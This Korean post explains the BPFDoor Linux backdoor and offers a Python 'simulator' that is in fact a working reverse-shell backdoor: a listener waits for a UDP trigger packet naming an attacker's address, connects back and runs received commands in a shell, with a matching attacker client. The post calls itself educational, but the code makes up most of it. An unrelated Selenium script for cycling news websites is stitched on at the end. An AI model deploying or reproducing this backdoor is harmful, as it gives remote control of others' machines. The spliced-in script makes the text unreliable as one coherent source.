bpfdoor란?
bpfdoor는 2022년 발견된 리눅스 기반의 고도화된 백도어 악성코드로, 다음과 같은 특징을 가집니다.
- 패킷 필터링: BPF(Berkeley Packet Filter)를 이용해 네트워크 인터페이스의 패킷을 직접 감시하며, 특정 트리거 패킷을 탐지합니다.
- 포트리스 백도어: 별도의 리스닝 포트 없이, 트리거 패킷이 도착할 때만 임시로 리버스 쉘을 오픈합니다.
- 은닉성: 흔적을 남기지 않고, rootkit 없이도 탐지 회피가 가능합니다.
- 다양한 프로토콜 지원: TCP, UDP, ICMP 등 다양한 프로토콜로 트리거를 받을 수 있습니다.
- 공격자 지정: 트리거 패킷에 공격자의 IP/포트 정보를 담아, 공격자가 원하는 곳으로 리버스 쉘을 연결합니다.
bpfdoor의 핵심 동작 원리를 Python으로 시뮬레이션한 예제입니다.
bpfdoor-like 백도어 시뮬레이터
이 프로젝트는 실제 bpfdoor 백도어의 동작을 학습/연구 목적으로 Python으로 최대한 유사하게 시뮬레이션한 예제입니다.
주요 구성 파일
bpf.py
: 서버(피해자) 역할. 트리거 패킷을 수신하면 공격자에게 리버스 쉘을 연결합니다.client.py
: 클라이언트(공격자) 역할. 트리거 패킷을 전송하고, 리버스 쉘 연결을 받아 명령을 실행합니다.
동작 방식
-
공격자(client.py)
- 자신의 IP/포트 정보를 포함한 트리거 패킷을 피해자에게 UDP로 전송합니다.
- 이후 해당 포트에서 리버스 쉘 연결을 대기합니다.
- 연결이 오면 명령을 입력할 수 있습니다.
__KILL__
명령을 입력하면 서버가 종료됩니다.
-
피해자(bpf.py)
- 지정된 포트에서 트리거 패킷을 대기합니다.
- 트리거 패킷을 수신하면, 패킷에 포함된 공격자 IP/포트로 TCP 리버스 쉘을 연결합니다.
- 쉘에서 명령을 받아 실행하고 결과를 반환합니다.
__KILL__
명령을 받으면 즉시 종료합니다.
예시 실행 방법
- 공격자(client.py) 실행
python3 client.py
- 피해자(bpf.py) 실행
python3 bpf.py
소스 코드
bpf.py
import socket
import subprocess
import threading
import struct
import os
# 설정
TRIGGER_KEYWORD = b"open_sesame"
LISTEN_PORT = 5555
def reverse_shell(conn):
conn.send(b"Reverse shell connected. Type commands:n")
while True:
conn.send(b"$ ")
cmd = conn.recv(1024).decode().strip()
if cmd == "__KILL__":
conn.send(b"[!] Server terminating by remote command.n")
conn.close()
os._exit(0)
if cmd.lower() in ["exit", "quit"]:
break
try:
output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
output = e.output
conn.send(output)
conn.close()
def packet_listener():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
s.bind(("0.0.0.0", LISTEN_PORT))
print(f"[+] Listening for trigger on UDP port {LISTEN_PORT}...")
while True:
data, addr = s.recvfrom(1024)
print(f"[+] Packet received from {addr}")
# 트리거 패킷: b"open_sesame" + 4바이트 IP + 2바이트 포트
if data.startswith(TRIGGER_KEYWORD) and len(data) >= len(TRIGGER_KEYWORD) + 6:
ip_bytes = data[len(TRIGGER_KEYWORD):len(TRIGGER_KEYWORD)+4]
port_bytes = data[len(TRIGGER_KEYWORD)+4:len(TRIGGER_KEYWORD)+6]
attacker_ip = socket.inet_ntoa(ip_bytes)
attacker_port = struct.unpack("!H", port_bytes)[0]
print(f"[!] Trigger detected. Connecting back to {attacker_ip}:{attacker_port}")
threading.Thread(target=connect_back, args=(attacker_ip, attacker_port)).start()
else:
print("[!] Trigger keyword not detected or attacker info missing.")
def connect_back(ip, port):
try:
shell_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shell_socket.connect((ip, port))
print(f"[+] Connected to attacker at {ip}:{port} for reverse shell.")
reverse_shell(shell_socket)
shell_socket.close()
except Exception as e:
print(f"[!] Failed to connect back: {e}")
if __name__ == "__main__":
try:
packet_listener()
except KeyboardInterrupt:
print("n[!] Stopped.")
client.py
import socket
import struct
import threading
def send_trigger(target_ip, target_port, attacker_ip, attacker_port):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
payload = b"open_sesame" + socket.inet_aton(attacker_ip) + struct.pack("!H", attacker_port)
s.sendto(payload, (target_ip, target_port))
s.close()
print(f"[+] Trigger sent to {target_ip}:{target_port}")
def handle_shell(conn):
try:
while True:
data = conn.recv(4096)
if not data:
break
print(data.decode(errors="ignore"), end="")
cmd = input()
conn.send((cmd + "n").encode())
if cmd.lower() in ["exit", "quit"]:
break
except Exception as e:
print(f"[!] Shell connection error: {e}")
finally:
conn.close()
def listen_shell(listen_ip, listen_port):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((listen_ip, listen_port))
server.listen(1)
print(f"[+] Waiting for reverse shell on {listen_ip}:{listen_port} ...")
conn, addr = server.accept()
print(f"[+] Connection from {addr}")
handle_shell(conn)
server.close()
if __name__ == "__main__":
# 설정: 공격자 IP/포트, 타겟 IP/포트
attacker_ip = "127.0.0.1"
attacker_port = 4444
target_ip = "127.0.0.1"
target_port = 5555
# 리버스 쉘 대기 스레드 시작
t = threading.Thread(target=listen_shell, args=(attacker_ip, attacker_port))
t.start()
# 트리거 패킷 전송
send_trigger(target_ip, target_port, attacker_ip, attacker_port)
t.join()
참고
- 연구 및 교육 목적으로만 사용하세요.
import time
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.chrome.options import Options
# 신문사 주소 리스트
urls = [“https://www.chosun.com”, “https://www.hani.co.kr”, “https://www.donga.com”]
# Chrome 브라우저 설정
chrome_options = Options()
chrome_options.add_argument(“–start-maximized”)
# 드라이버 경로 (ChromeDriver가 설치된 경로 지정 필요)
service = Service(executable_path=”/opt/homebrew/bin/chromedriver”) # 예: “/usr/local/bin/chromedriver”
service = Service(executable_path=”/opt/homebrew/bin/chromedriver”)
# 브라우저 열기
driver = webdriver.Chrome(service=service, options=chrome_options)
try:
while True:
for url in urls:
driver.get(url)
time.sleep(10) # 10초 대기
except KeyboardInterrupt:
driver.quit()